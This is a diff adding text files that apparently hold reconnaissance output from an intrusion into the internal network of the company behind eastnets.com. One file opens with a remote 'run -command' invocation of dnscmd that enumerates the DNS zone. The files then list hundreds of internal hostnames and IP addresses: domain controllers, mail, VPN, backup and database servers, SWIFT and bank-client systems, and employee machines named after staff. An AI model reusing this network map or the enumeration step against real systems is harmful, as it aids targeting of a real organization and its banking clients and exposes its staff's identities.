+ENDXBDC001 [Aging:3618329] 3600 A	192.168.3.10
+endxbgp [Aging:3618320] 1200 A	192.168.3.12
+ENDXBJMAGCULANG [Aging:3607996] 1200 A	10.10.10.67
+		 [Aging:3607996] 1200 A	10.10.10.27
+ENDXBMLEMORINAS [Aging:3601459] 1200 A	10.10.10.97
+ENDXBMRABAINO [Aging:3597533] 1200 A	10.10.10.47
+ENDXBTOSHIBA [Aging:3617626] 1200 A	10.10.10.131
+ENDXBYAbuAnzeh [Aging:3618292] 1200 A	10.10.10.84
+ENE-30old [Aging:3598186] 1200 A	10.10.0.168
+ENE-CPL010 [Aging:3618270] 1200 A	10.10.0.105
+ENE-DEV-Test [Aging:3596749] 1200 A	10.10.0.14
+ENE-Eyasinlab [Aging:3598110] 1200 A	10.10.0.133
+ENE-xp [Aging:3606346] 1200 A	10.10.0.13
+ENE001 [Aging:3618323] 1200 A	10.10.0.53
+ENE001A [Aging:3608984] 1200 A	10.10.0.147
+ENE002 [Aging:3618133] 1200 A	10.10.0.89
+ENE002A [Aging:3603348] 1200 A	10.10.0.156
+ENE002j [Aging:3609367] 1200 A	10.10.0.136
+ENE002T [Aging:3598186] 1200 A	10.10.0.65
+ENE003 [Aging:3618326] 1200 A	10.10.0.98
+ENE003A [Aging:3610665] 1200 A	10.10.0.71
+ENE003T [Aging:3600583] 1200 A	10.10.0.175
+ENE004 [Aging:3604017] 1200 A	10.10.0.98
+ENE004A [Aging:3600581] 1200 A	10.10.0.145
+ENE006T [Aging:3603347] 1200 A	10.10.0.58
+ENE007 [Aging:3609394] 1200 A	10.10.0.97
+ENE008 [Aging:3604280] 1200 A	10.10.0.57
+ENE009 [Aging:3607997] 1200 A	10.10.0.87
+ENE010 [Aging:3618113] 1200 A	10.10.0.157
+ene011 [Aging:3618319] 1200 A	10.10.0.78
+ENE012old [Aging:3600464] 1200 A	10.10.0.171
+ene013 [Aging:3618318] 1200 A	10.10.0.85
+ene014 [Aging:3618294] 1200 A	10.10.0.79
+ENE015 [Aging:3618061] 1200 A	10.10.0.70
+ENE016 [Aging:3618294] 1200 A	10.10.0.149
+ENE017 [Aging:3618318] 1200 A	10.10.0.65
+ene018 [Aging:3618133] 1200 A	10.10.0.121
+ene019 [Aging:3618108] 1200 A	10.10.0.99
+ENE020 [Aging:3618318] 1200 A	10.10.0.91
+ENE021 [Aging:3607665] 1200 A	10.10.0.85
+ENE022 [Aging:3610523] 1200 A	10.10.0.104
+ENE023 [Aging:3617864] 1200 A	10.10.0.160
+ene024 [Aging:3602286] 1200 A	10.10.0.117
+ene025 [Aging:3609366] 1200 A	10.10.0.76
+ene026 [Aging:3618133] 1200 A	10.10.0.119
+ene027 [Aging:3618321] 1200 A	10.10.0.83
+ENE029 [Aging:3618133] 1200 A	10.10.0.138
+ENE030 [Aging:3618133] 1200 A	10.10.0.76
+ene031 [Aging:3618297] 1200 A	10.10.0.74
+ENE032 [Aging:3618133] 1200 A	10.10.0.147
+ene033 [Aging:3618133] 1200 A	10.10.0.92
+ENE034 [Aging:3618295] 1200 A	10.10.0.75
+ene036 [Aging:3618318] 1200 A	10.10.0.88
+ene037 [Aging:3618246] 1200 A	10.10.0.84
+ENE038 [Aging:3618294] 1200 A	10.10.0.148
+ene040 [Aging:3602502] 1200 A	10.10.0.108
+ENE041 [Aging:3610835] 1200 A	10.10.0.64
+ENE042 [Aging:3609367] 1200 A	10.10.0.102
+ene043 [Aging:3618133] 1200 A	10.10.0.163
+ENE046 [Aging:3618322] 1200 A	10.10.0.112
+ENE049 [Aging:3618270] 1200 A	10.10.0.135
+ENE050 [Aging:3618318] 1200 A	10.10.0.182
+ene051 [Aging:3608646] 1200 A	10.10.0.91
+ENE057 [Aging:3608841] 1200 A	10.10.0.113
+ENE058 [Aging:3618134] 1200 A	10.10.0.110
+ENE059 [Aging:3603272] 1200 A	10.10.0.118
+ENEACC001 [Aging:3618317] 1200 A	10.10.0.69
+ENEacer3 [Aging:3596939] 1200 A	10.10.0.175
+ENEAcer4 [Aging:3598398] 1200 A	10.10.0.97
+ENEAllTracer [Aging:3618318] 1200 A	10.10.0.227
+enebackup [Aging:3612011] 1200 A	10.10.0.204
+ENEcpl050 [Aging:3618322] 1200 A	10.10.0.90
+ENEDB [Aging:3618320] 1200 A	10.10.0.8
+ENEDBServer2 [Aging:3618320] 1200 A	10.10.0.180
+enedc [Aging:3618330] 3600 A	10.10.0.5
+ENEDEV001 [Aging:3600084] 1200 A	10.10.0.159
+enedev001n [Aging:3603342] 1200 A	10.10.0.56
+ENEDEV002 [Aging:3610831] 1200 A	10.10.0.57
+ENEDEV003 [Aging:3618325] 1200 A	10.10.0.134
+ENEDEV004 [Aging:3613400] 1200 A	10.10.0.233
+ENEDEV006 [Aging:3618223] 1200 A	10.10.0.139
+enedevhasanen [Aging:3618297] 1200 A	10.10.0.233
+enedt [Aging:3618324] 1200 A	10.10.0.21
+ENEENASLAP [Aging:3618229] 1200 A	10.10.0.199
+ENEfatmalap [Aging:3616928] 1200 A	10.10.0.166
+		 [Aging:3616928] 1200 A	10.10.0.72
+ENEFSERVER [Aging:3618311] 1200 A	10.10.0.6
+ENEIDM [Aging:3618322] 1200 A	10.10.0.7
+enemail [Aging:3618320] 1200 A	10.10.0.4
+		 3600 MX	10 enemail.eastnets.com.
+enendb [Aging:3602122] 1200 A	10.10.0.14
+ENEOgomalap [Aging:3616258] 1200 A	10.10.0.96
+ENEPrinter [Aging:3606180] 1200 A	10.10.0.125
+enerashalap [Aging:3610998] 1200 A	10.10.0.63
+ENEServer64bit [Aging:3603757] 1200 A	10.10.0.9
+ENESUNVM 3600 A	10.10.0.228
+enetest3 [Aging:3603150] 1200 A	10.10.0.59
+enetestserver [Aging:3615751] 1200 A	10.10.0.155
+ENEU-NNASSR [Aging:3616736] 1200 A	192.168.253.84
+eneu0420132 [Aging:3618081] 1200 A	192.168.253.92
+ENEUADRISSI [Aging:3618125] 1200 A	192.168.253.31
+ENEUAKUMAR [Aging:3618319] 1200 A	192.168.253.216
+ENEUALHEUREUX [Aging:3618319] 1200 A	192.168.253.133
+ENEUDDUTHEIL [Aging:3606632] 1200 A	192.168.251.10
+ENEUFINANCE01 [Aging:3618322] 1200 A	192.168.253.153
+eneujlaera [Aging:3618327] 1200 A	10.10.200.25
+		 [Aging:3618327] 1200 A	192.168.251.44
+ENEULDELCROIX [Aging:3617912] 1200 A	192.168.253.61
+ENEULUX01 [Aging:3612536] 1200 A	192.168.253.105
+ENEUNNASSR2 [Aging:3618323] 1200 A	192.168.253.61
+eneusgathy [Aging:3618313] 1200 A	192.168.253.142
+ENEUSMARCHANT [Aging:3618296] 1200 A	192.168.253.199
+ENEUSTHROMAS [Aging:3614365] 1200 A	192.168.253.106
+ENEUTEST042013 [Aging:3615874] 1200 A	192.168.253.113
+ENEVMMonitor [Aging:3604076] 1200 A	10.10.0.14
+ENGDIS [Aging:3617896] 1200 A	10.10.200.11
+ENGY-PC [Aging:3618270] 1200 A	10.10.0.123
+enhq-backup [Aging:3618318] 1200 A	10.10.10.3
+ENHQ-BLACKBERRY [Aging:3597077] 1200 A	10.10.10.200
+ENHR [Aging:3613398] 1200 A	192.168.50.105
+ENHRIS [Aging:3618325] 1200 A	192.168.0.11
+ENITOMAR [Aging:3618322] 1200 A	10.10.200.29
+ENJOSEPH-PC [Aging:3600513] 1200 A	192.168.253.124
+enjysaadlap [Aging:3617028] 1200 A	10.10.0.52
+		 [Aging:3617028] 1200 A	10.10.0.57
+enlap-xkervyn [Aging:3598135] 1200 A	192.168.253.106
+ENLEPROJECT001 [Aging:3604475] 1200 A	10.10.200.29
+enlyncse 3600 A	192.168.0.7
+enmeeting 3600 A	192.168.0.7
+ENMORE [Aging:3607688] 1200 A	192.168.100.124
+ENprojects 3600 A	192.168.0.28
+ENPS-SUPPORT [Aging:3618324] 900 A	192.168.0.148
+ENPSDEV [Aging:3618323] 900 A	192.168.50.84
+ENPSQA [Aging:3615491] 1200 A	192.168.50.56
+ENPSSUPPORT-DR [Aging:3618321] 900 A	192.168.50.31
+enpublic 3600 A	192.168.0.36
+enreporting3-1 [Aging:3605144] 1200 A	192.168.253.153
+ENSAFEWATCH 3600 A	80.227.254.232
+ENSBDRSA1 3600 A	192.168.0.32
+ENSBSWIFTTEST 3600 A	192.168.100.95
+ensip 3600 A	192.168.0.7
+ENTEST01 [Aging:3612226] 1200 A	192.168.253.112
+entfs [Aging:3618325] 1200 A	192.168.100.133
+ENTFS2012 [Aging:3618310] 900 A	192.168.50.99
+ENTIEVEGI [Aging:3603183] 1200 A	192.168.253.181
+entranet 3600 A	192.168.0.12
+ENUSA001 [Aging:3604160] 1200 A	192.168.253.73
+ENUSDC01 [Aging:3618331] 3600 A	192.168.153.201
+enusdc02 [Aging:3602989] 1200 A	192.168.153.115
+ENUSFS01 3600 A	192.168.153.200
+ENUSSALE01 [Aging:3618328] 1200 A	192.168.153.114
+envincent [Aging:3610383] 1200 A	192.168.253.188
+ERKAY-PC [Aging:3610573] 1200 A	192.168.50.31
+esaadlap [Aging:3601619] 1200 A	10.10.0.173
+ESurvey [Aging:3617196] 1200 A	192.168.100.142
+exnew131 [Aging:3611838] 1200 A	192.168.50.175
+eyasinlap [Aging:3599094] 1200 A	10.10.0.158
+fatma-laptop [Aging:3596460] 1200 A	10.10.0.76
+fidelity 3600 A	192.168.253.206
+Filtering3_2 [Aging:3607473] 1200 A	192.168.100.161
+FilteringDEV [Aging:3618330] 1200 A	192.168.100.201
+FMX [Aging:3618316] 1200 A	192.168.100.111
+Foracle3_2 [Aging:3602169] 1200 A	192.168.100.163
+fraudisraa [Aging:3607640] 1200 A	192.168.0.239
+FRAUDVM [Aging:3612896] 1200 A	192.168.0.247
+fsql2008 [Aging:3599889] 1200 A	192.168.100.103
+ftp 3600 A	10.10.10.250
+ftpbe 3600 A	192.168.253.142
+ftpenss 3600 A	192.168.253.142
+Gemini 3600 A	192.168.253.167
+GP-TEST [Aging:3607320] 1200 A	192.168.0.126
+GreenGiant 3600 A	192.168.253.240
+group-mail 3600 A	192.168.253.111
+GSM [Aging:3617339] 1200 A	192.168.100.138
+GUILLE [Aging:3617967] 1200 A	192.168.153.122
+GUINEAPIG [Aging:3610297] 1200 A	192.168.253.113
+HAMMAD-PC [Aging:3609344] 1200 A	10.10.10.63
+HAPPY1 3600 A	192.168.253.208
+HAPPY2 3600 A	192.168.253.203
+Helios 3600 A	192.168.253.20
+hermes [Aging:3618324] 1200 A	192.168.253.37
+hqbackup [Aging:3596884] 1200 A	10.10.10.198
+hr 3600 A	192.168.0.11
+HRVM [Aging:3608675] 1200 A	192.168.50.33
+HYPER-V-SERVER [Aging:3618330] 1200 A	192.168.100.31
+IBRAHIM-PC [Aging:3613910] 1200 A	10.10.10.56
+INTEGRATION1 [Aging:3618323] 1200 A	192.168.100.180
+Integration2 [Aging:3618323] 1200 A	192.168.100.190
+Intranet 3600 A	192.168.253.87
+INVESTDAR [Aging:3618329] 900 A	192.168.0.210
+ipek-TOSH [Aging:3606438] 900 A	192.168.0.86
+itbx-side 3600 A	192.168.253.35
+JoanM [Aging:3604927] 1200 A	10.10.10.126
+jupiter [Aging:3618313] 1200 A	192.168.240.2
+jupiter2 [Aging:3618313] 1200 A	192.168.253.2
+		 [Aging:3618313] 1200 A	192.168.240.7
+		 [Aging:3618313] 1200 A	192.168.253.180
+		 [Aging:3618313] 1200 A	192.168.253.194
+JUy [Aging:3599958] 1200 A	10.10.10.117
+KAPFVM [Aging:3618326] 1200 A	192.168.50.192
+kbaluyot [Aging:3604347] 1200 A	10.10.10.118
+kfhbk [Aging:3614838] 1200 A	192.168.100.103
+Khalil-VAIO [Aging:3618325] 1200 A	10.10.10.136
+KIOSKDEV [Aging:3604112] 1200 A	192.168.100.186
+KIOSKQA [Aging:3600804] 1200 A	192.168.100.145
+kronos 3600 A	192.168.253.25
+LAPTOP [Aging:3613859] 1200 A	10.10.10.172
+limo 3600 A	192.168.253.234
+LiteVM [Aging:3607358] 1200 A	192.168.100.181
+LLN 3600 A	192.168.253.2
+Lync 3600 A	192.168.0.7
+mabudarw-xwg4zh 3600 A	192.168.100.84
+mahdy [Aging:3602313] 1200 A	10.10.0.116
+		 [Aging:3602313] 1200 A	10.10.0.59
+MAHDY-PC [Aging:3618270] 1200 A	10.10.0.67
+maximus [Aging:3608193] 3600 A	192.168.253.236
+		 [Aging:3608193] 3600 A	10.10.250.2
+maya 3600 A	192.168.253.74
+medusa 3600 A	192.168.253.1
+meet 3600 A	192.168.0.7
+meeting 3600 A	192.168.0.7
+MHMD-LAP [Aging:3607039] 1200 A	10.10.0.86
+MHMD-PC [Aging:3608122] 1200 A	10.10.0.68
+MICHEL-VAIO [Aging:3618327] 1200 A	192.168.253.144
+		 [Aging:3618327] 1200 A	192.168.253.181
+MJAREER-PC [Aging:3604851] 1200 A	10.10.10.89
+MKHAOUAM-PC [Aging:3617629] 1200 A	192.168.153.156
+MNAYFEH-PC [Aging:3601137] 1200 A	10.10.10.173
+MOBILEVM [Aging:3602098] 1200 A	192.168.100.182
+MOMEN [Aging:3618293] 900 A	192.168.0.119
+MonSys [Aging:3603751] 1200 A	10.10.0.14
+MORE2_0 [Aging:3602671] 1200 A	192.168.100.192
+MOREDEV [Aging:3618324] 1200 A	192.168.100.193
+MOREVM [Aging:3618323] 1200 A	192.168.100.166
+MOREVS2012 [Aging:3612537] 1200 A	192.168.0.207
+MQasimXP [Aging:3617414] 1200 A	192.168.50.71
+nezar [Aging:3599989] 1200 A	192.168.253.133
+NNASSR-PC [Aging:3618327] 1200 A	192.168.253.84
+nzr-of25arpakm1 [Aging:3603662] 1200 A	192.168.253.164
+Ofiltering32 [Aging:3605864] 1200 A	192.168.100.167
+ORA322 [Aging:3614176] 1200 A	192.168.50.47
+Oracle10 [Aging:3605771] 1200 A	192.168.100.88
+ORASWF64 [Aging:3618325] 1200 A	192.168.0.122
+OSAIED-PC [Aging:3612319] 1200 A	10.10.10.146
+OSAIED2-PC [Aging:3618227] 1200 A	10.10.10.27
+OSSAMA-ZIDE [Aging:3611628] 1200 A	10.20.0.195
+ossamazide [Aging:3609126] 1200 A	10.10.0.100
+OSTICKET01 [Aging:3606967] 1200 A	192.168.0.224
+PAYSAFE [Aging:3601550] 1200 A	192.168.100.148
+PaySafeBank-Test [Aging:3618319] 1200 A	192.168.100.200
+PAYSAFEDEV [Aging:3614363] 1200 A	192.168.100.194
+PBUELENS [Aging:3608174] 1200 A	192.168.253.93
+pbviews [Aging:3618311] 1200 A	192.168.3.13
+PC5 [Aging:3611243] 1200 A	192.168.50.32
+PORACLE131 [Aging:3618319] 1200 A	192.168.100.128
+POracleVM [Aging:3608143] 1200 A	192.168.0.160
+posserver [Aging:3616996] 1200 A	192.168.100.136
+POSVM [Aging:3613233] 1200 A	192.168.100.185
+presalesvm [Aging:3610022] 1200 A	192.168.50.186
+presalesvm2 [Aging:3610139] 1200 A	192.168.50.43
+PROAJMAN [Aging:3618325] 900 A	192.168.50.136
+profilingaib03 [Aging:3603353] 1200 A	192.168.100.246
+PROFILINGBOJ [Aging:3614916] 1200 A	192.168.50.110
+PSQLVM2008 [Aging:3601932] 1200 A	192.168.100.165
+PWC-VAIO [Aging:3606873] 1200 A	192.168.253.236
+QADB2 [Aging:3618323] 1200 A	192.168.100.70
+qahost1 [Aging:3618320] 1200 A	192.168.100.100
+qahost2 [Aging:3618324] 1200 A	192.168.100.120
+QAHOST3 [Aging:3618307] 1200 A	192.168.100.140
+		 [Aging:3618307] 1200 A	192.168.50.236
+QAHOST4 [Aging:3618326] 1200 A	192.168.100.160
+QASAA7 [Aging:3609634] 1200 A	192.168.100.210
+QATESTING1 [Aging:3618320] 900 A	192.168.50.235
+QATESTING2 [Aging:3616914] 1200 A	192.168.50.103
+Qidrisi [Aging:3597586] 1200 A	10.10.10.22
+qiib-cc [Aging:3609535] 1200 A	192.168.100.137
+QNBAPP [Aging:3609331] 1200 A	192.168.50.101
+QNBAPPDR [Aging:3609331] 1200 A	192.168.50.71
+QNBDB [Aging:3610355] 1200 A	192.168.50.195
+QNBDBDR [Aging:3610290] 1200 A	192.168.0.207
+QNBPH1 [Aging:3613596] 1200 A	192.168.100.106
+QNBPH1-DEV [Aging:3607688] 1200 A	192.168.100.107
+QNBPH2 [Aging:3613595] 1200 A	192.168.100.101
+QNBPH3 [Aging:3605174] 1200 A	192.168.100.169
+QNBPH3QA [Aging:3618083] 1200 A	192.168.100.112
+QNBPH3s4 [Aging:3618299] 1200 A	192.168.100.172
+QNBPH3VM [Aging:3602210] 1200 A	192.168.100.168
+QNBVM [Aging:3602600] 1200 A	192.168.100.109
+RashaLaptop [Aging:3616254] 1200 A	10.10.0.93
+rdevilla-PC [Aging:3613211] 1200 A	10.10.10.137
+reem [Aging:3597870] 1200 A	10.10.10.108
+REPORADB [Aging:3616596] 1200 A	192.168.0.205
+REPORTING2-4 [Aging:3607359] 1200 A	192.168.100.183
+REPORTINGORA [Aging:3610832] 1200 A	192.168.100.159
+REPORTINGSQL [Aging:3615493] 1200 A	192.168.100.149
+RepSoge [Aging:3608480] 1200 A	192.168.100.249
+REPTW [Aging:3606131] 1200 A	192.168.100.150
+ROBIN [Aging:3616045] 1200 A	192.168.153.110
+RSATEST01 [Aging:3597034] 1200 A	192.168.0.31
+rx2660 3600 A	192.168.253.203
+SAA7DEV [Aging:3606178] 1200 A	192.168.100.195
+SAA7DEV1 [Aging:3618317] 1200 A	192.168.100.236
+SAAMQ [Aging:3618301] 1200 A	192.168.100.191
+samerm [Aging:3604808] 1200 A	10.10.10.34
+SCSK [Aging:3612896] 1200 A	192.168.100.88
+SEDSWF [Aging:3604454] 1200 A	192.168.100.155
+SEPA [Aging:3618329] 900 A	192.168.50.105
+serenity 3600 A	192.168.253.78
+SGadallah [Aging:3596996] 1200 A	192.168.153.133
+sharepoint 3600 A	192.168.0.39
+sharepointarray 3600 A	192.168.0.39
+SHERIF-PC [Aging:3600824] 1200 A	10.20.0.106
+SIDE0078 [Aging:3599768] 1200 A	192.168.253.157
+SIDELAP05 [Aging:3602459] 1200 A	192.168.253.173
+sinbad 3600 A	192.168.0.29
+Slap [Aging:3618229] 1200 A	10.10.0.150
+SMOWAFY-LAPTOP [Aging:3618304] 1200 A	10.20.0.102
+Solaris 3600 A	192.168.253.22
+SQLSWF321 [Aging:3615505] 1200 A	192.168.0.236
+sthromas [Aging:3603827] 1200 A	192.168.253.242
+store [Aging:3618330] 1200 A	10.10.10.180
+sunserver 3600 A	192.168.100.114
+SWF312 [Aging:3615514] 1200 A	192.168.100.254
+SWF322 [Aging:3608941] 1200 A	192.168.50.65
+SWF34ORA [Aging:3618321] 1200 A	192.168.50.91
+SWF3_3 [Aging:3601741] 1200 A	192.168.100.143
+SWFCAT [Aging:3616526] 1200 A	192.168.100.121
+SWFSQL [Aging:3605984] 1200 A	192.168.100.174
+SWFWAS [Aging:3607689] 1200 A	192.168.100.123
+SWFWL [Aging:3608099] 1200 A	192.168.100.122
+SWIFT2008VM [Aging:3612204] 1200 A	192.168.10.132
+TASWEEQQA [Aging:3608857] 1200 A	192.168.100.237
+Telemak 3600 A	192.168.253.28
+Telemak-LOM 3600 A	192.168.253.247
+TEST1-PC [Aging:3617936] 1200 A	10.10.0.160
+Testbox 3600 A	192.168.253.26
+testing [Aging:3617605] 1200 A	192.168.100.135
+testvista-pc [Aging:3599960] 1200 A	192.168.253.127
+tfs2008mig [Aging:3612513] 1200 A	192.168.50.96
+tfs2008new [Aging:3612229] 1200 A	192.168.50.131
+TFS2010 [Aging:3607112] 1200 A	192.168.100.196
+tfsamman1 [Aging:3618328] 1200 A	192.168.100.245
+tfsammanTest [Aging:3613163] 1200 A	192.168.50.109
+TFSEPM [Aging:3616272] 1200 A	192.168.0.28
+TFSEPM1 [Aging:3610812] 1200 A	192.168.50.93
+TFSHOST [Aging:3618320] 1200 A	192.168.100.250
+TFSTEST2012 [Aging:3613255] 1200 A	192.168.0.184
+theobaxter [Aging:3613037] 1200 A	10.10.10.26
+THEOBAXTER-PC [Aging:3610491] 1200 A	10.10.10.42
+THINKPAD [Aging:3617972] 1200 A	192.168.153.192
+titeuf 3600 A	192.168.253.249
+TKeyrouz [Aging:3609321] 1200 A	10.10.10.66
+TOSHIBA-PC [Aging:3617937] 1200 A	10.10.200.64
+UAEFTSLIVE [Aging:3618319] 900 A	192.168.50.115
+UAEFTSVM [Aging:3618326] 1200 A	192.168.100.158
+ubi [Aging:3618331] 1200 A	192.168.100.130
+user-7uzetgz0uz [Aging:3611672] 1200 A	192.168.50.151
+user-db1aeca1b9 [Aging:3607690] 1200 A	192.168.50.160
+user-pc [Aging:3610811] 1200 A	192.168.50.87
+USER-PC025 [Aging:3608723] 1200 A	192.168.50.150
+vDCBackup [Aging:3618316] 1200 A	192.168.3.16
+vDXBBackup [Aging:3613510] 1200 A	10.10.10.150
+VERICENTRE [Aging:3612537] 1200 A	192.168.100.179
+victory 3600 A	192.168.253.21
+Viking [Aging:3610578] 1200 A	192.168.253.104
+vMailJournal [Aging:3614975] 1200 A	10.10.10.105
+VMBEXEC01 [Aging:3617292] 1200 A	192.168.50.39
+VMENBARASKIN [Aging:3618313] 1200 A	192.168.253.157
+vNEWPBViews [Aging:3618322] 1200 A	192.168.3.14
+vpn 3600 A	192.168.3.20
+VS2012 [Aging:3610961] 1200 A	192.168.50.146
+w2k3 [Aging:3613617] 1200 A	192.168.253.129
+WAS8 [Aging:3618327] 900 A	192.168.50.36
+wasdev 3600 A	192.168.100.239
+wbukhari [Aging:3596933] 1200 A	10.10.10.113
+webmail 3600 A	192.168.0.50
+WIN-MTO1SG4UMI2 [Aging:3618132] 1200 A	192.168.253.104
+WIN-TGT5TAOB2FM [Aging:3611697] 1200 A	192.168.100.80
+win2003vmtest4 [Aging:3598361] 1200 A	192.168.253.155
+WIN2008VM2 [Aging:3603578] 1200 A	192.168.253.56
+Windows2003test [Aging:3603584] 1200 A	192.168.253.55
+WMQVM [Aging:3616857] 1200 A	192.168.50.192
+wpad 3600 A	10.10.0.10
+WSS2008 [Aging:3613236] 1200 A	192.168.50.161
+WSS_2008 [Aging:3612318] 1200 A	192.168.50.33
+www 3600 A	207.56.175.157
+
+Command completed successfully.
+
+Process terminated with status 0
+
+
+    Command completed successfully

swift/DNS Zone Trans 2013_10_17.txt

@@ -0,0 +1,873 @@
+Command: run -command "c:\windows\system32\dnscmd.exe 127.0.0.1 /enumrecords eastnets.com @" -redirect
+
+Process started with id 5300
+Returned records:
+@ [Aging:3618462] 600 A	169.254.106.117
+		 [Aging:3618460] 600 A	169.254.141.101
+		 [Aging:3618460] 600 A	169.254.200.229
+		 [Aging:3618460] 600 A	192.168.0.15
+		 [Aging:3618459] 600 A	192.168.253.230
+		 [Aging:3618467] 600 A	192.168.2.25
+		 [Aging:3618457] 600 A	169.254.38.180
+		 [Aging:3618457] 600 A	192.168.153.201
+		 [Aging:3617378] 600 A	169.254.49.231
+		 [Aging:3618462] 600 A	10.10.0.5
+		 [Aging:3618455] 600 A	169.254.71.145
+		 [Aging:3618455] 600 A	192.168.3.10
+		 [Aging:3618464] 600 A	192.168.240.10
+		 [Aging:3618465] 600 A	192.168.0.16
+		 3600 NS	enammad002.eastnets.com.
+		 [Aging:3618466] 3600 NS	endxbdc001.eastnets.com.
+		 3600 NS	enbevdc1.eastnets.com.
+		 3600 NS	endcbackup.eastnets.com.
+		 3600 NS	vdc04.eastnets.com.
+		 3600 NS	vendc01.eastnets.com.
+		 3600 NS	enusdc01.eastnets.com.
+		 3600 NS	enbedc01.eastnets.com.
+		 3600 NS	enammad001.eastnets.com.
+		 3600 NS	enedc.eastnets.com.
+		 3600 NS	endxbmail001.eastnets.com.
+		 3600 SOA	endcbackup.eastnets.com. admin. 553880 300 600 86400 3600
+AABUGHALION-PC [Aging:3618368] 1200 A	10.10.10.38
+ABU_ALSONDOS [Aging:3610980] 1200 A	192.168.0.123
+ADclient 3600 A	192.168.100.132
+Adel-Lap [Aging:3610807] 1200 A	10.10.0.56
+ADJD [Aging:3607688] 1200 A	192.168.100.110
+admin 3600 A	192.168.0.7
+admin-PC [Aging:3618448] 1200 A	192.168.153.112
+adpvm [Aging:3606516] 1200 A	192.168.100.108
+Afnanjaber-vmxp [Aging:3614717] 1200 A	192.168.50.79
+AJALALUDEEN-PC [Aging:3604957] 1200 A	10.10.10.92
+Aladdin 3600 A	192.168.253.27
+AliKalakech-PC [Aging:3616935] 1200 A	10.10.200.13
+Allison [Aging:3607885] 1200 A	192.168.153.194
+Amman 3600 A	192.168.0.50
+Amman1-dag [Aging:3618466] 300 A	192.168.0.51
+ammanaixdev 3600 A	192.168.100.247
+apollo 3600 A	192.168.253.200
+apollo-PC [Aging:3606124] 1200 A	10.10.10.167
+araskin [Aging:3618443] 1200 A	192.168.253.182
+Artemis 3600 A	192.168.253.23
+Artemis-LOM 3600 A	192.168.253.248
+Athena 3600 A	192.168.253.29
+autodiscover 3600 A	192.168.0.50
+autotest [Aging:3618464] 900 A	192.168.50.88
+backup [Aging:3618462] 1200 A	10.10.0.196
+BAMVM [Aging:3602625] 1200 A	192.168.100.171
+Bashar-VAIO [Aging:3596909] 1200 A	10.10.10.141
+BDuheidel-VAIO [Aging:3610230] 1200 A	10.10.10.106
+BDUHEIDELVAIO [Aging:3618225] 1200 A	10.10.10.103
+Bigblue 3600 A	192.168.253.24
+Bilal-SDPtest [Aging:3612852] 1200 A	192.168.0.147
+BILLYEASTNETS [Aging:3617045] 1200 A	10.10.10.91
+BKExchange2010 [Aging:3618466] 1200 A	192.168.0.2
+blog 3600 A	174.123.131.41
+Brussels 3600 A	192.168.240.19
+Brussels-dag [Aging:3618464] 300 A	192.168.240.21
+BTSERVER [Aging:3609528] 1200 A	192.168.100.139
+Burgan [Aging:3617605] 1200 A	192.168.100.134
+censornet 3600 A	10.10.0.10
+cerberus 3600 A	192.168.253.125
+Chadi [Aging:3604346] 1200 A	10.10.10.20
+challenger_test [Aging:3618446] 1200 A	192.168.253.205
+CLUSTER [Aging:3605360] 1200 A	192.168.100.218
+Columbia 3600 A	192.168.253.90
+compliance34 [Aging:3606871] 1200 A	192.168.50.150
+compliancepro [Aging:3607183] 1200 A	192.168.50.52
+Copernic 3600 A	192.168.253.75
+Corona1 3600 A	192.168.253.132
+corona2 3600 A	192.168.253.85
+CPLDEMO [Aging:3617872] 1200 A	192.168.100.216
+CPLDEV [Aging:3618463] 1200 A	192.168.100.214
+CPLVM [Aging:3618446] 1200 A	192.168.100.212
+CPLVM2 [Aging:3614172] 1200 A	192.168.100.224
+CRMMAIL 3600 CNAME	enfs.eastnets.com.
+davids [Aging:3597838] 1200 A	10.10.10.88
+Dawn-PC [Aging:3605317] 1200 A	192.168.153.162
+dell [Aging:3617286] 1200 A	10.10.10.116
+DELL-PC [Aging:3615369] 1200 A	10.10.10.122
+DEVDB [Aging:3618445] 1200 A	192.168.100.182
+devres [Aging:3604428] 1200 A	192.168.100.238
+DevVM [Aging:3612537] 1200 A	192.168.0.182
+dialin 3600 A	192.168.0.7
+Discovery 3600 A	192.168.253.166
+DMZ1 3600 A	192.168.253.142
+DOTDEV [Aging:3601550] 1200 A	192.168.100.187
+DOUBLE1 [Aging:3608515] 1200 A	192.168.0.144
+DOUBLE2 [Aging:3608517] 1200 A	192.168.0.140
+DOUBLETAKE [Aging:3609653] 1200 A	192.168.0.64
+dt2 [Aging:3603444] 1200 A	10.10.0.56
+Dubaiprinter 3600 A	10.10.10.3
+DXB-AROUSAN [Aging:3614164] 1200 A	10.10.10.95
+Dynamo 3600 A	192.168.253.121
+dzovi [Aging:3610544] 1200 A	192.168.253.48
+Easi 3600 A	192.168.253.15
+eastnets-49e020 [Aging:3601814] 1200 A	192.168.153.153
+eastnets-5c9349 [Aging:3599963] 1200 A	192.168.253.124
+eastnets-74007f [Aging:3602292] 1200 A	192.168.251.23
+eastnets-a1jtim [Aging:3607666] 1200 A	192.168.50.95
+eastnets-ae3f26 [Aging:3601817] 1200 A	192.168.153.108
+eastnets-bade3b [Aging:3618463] 1200 A	192.168.253.233
+eastnets1 [Aging:3618447] 1200 A	10.10.0.120
+eastranet 3600 A	192.168.0.12
+EismailLap [Aging:3610710] 1200 A	10.10.0.65
+ELASTIK [Aging:3606800] 1200 A	192.168.50.138
+en-ms [Aging:3600301] 1200 A	10.10.10.70
+ENAM-Ahmed [Aging:3606517] 1200 A	192.168.50.47
+ENAMACC07 [Aging:3610807] 1200 A	192.168.50.65
+ENAMAHMED-PC [Aging:3614386] 1200 A	192.168.50.89
+ENAMBackup001 [Aging:3618131] 1200 A	192.168.0.25
+ENAMBackup01 [Aging:3618466] 1200 A	192.168.0.25
+ENAMBB001 [Aging:3618447] 1200 A	192.168.0.8
+ENAMBSS001 [Aging:3611406] 1200 A	192.168.0.185
+ENAMCRM01 [Aging:3618446] 1200 A	192.168.0.14
+enamcruise [Aging:3604978] 1200 A	192.168.0.28
+enamdata [Aging:3618462] 1200 A	192.168.0.22
+ENAMDES004 [Aging:3614382] 1200 A	192.168.128.50
+		 [Aging:3614382] 1200 A	192.168.0.222
+ENAMDES02 [Aging:3607542] 1200 A	192.168.0.181
+		 [Aging:3607542] 1200 A	192.168.0.175
+ENAMDEV001 [Aging:3613044] 1200 A	192.168.50.194
+enamdev01 [Aging:3611334] 1200 A	192.168.0.159
+		 [Aging:3611334] 1200 A	192.168.50.169
+enamdev013 [Aging:3608506] 1200 A	192.168.0.98
+ENAMDEV029 [Aging:3610304] 1200 A	10.10.10.67
+ENAMDEV040 [Aging:3605793] 1200 A	192.168.50.63
+ENAMDEV052 [Aging:3608982] 1200 A	192.168.50.32
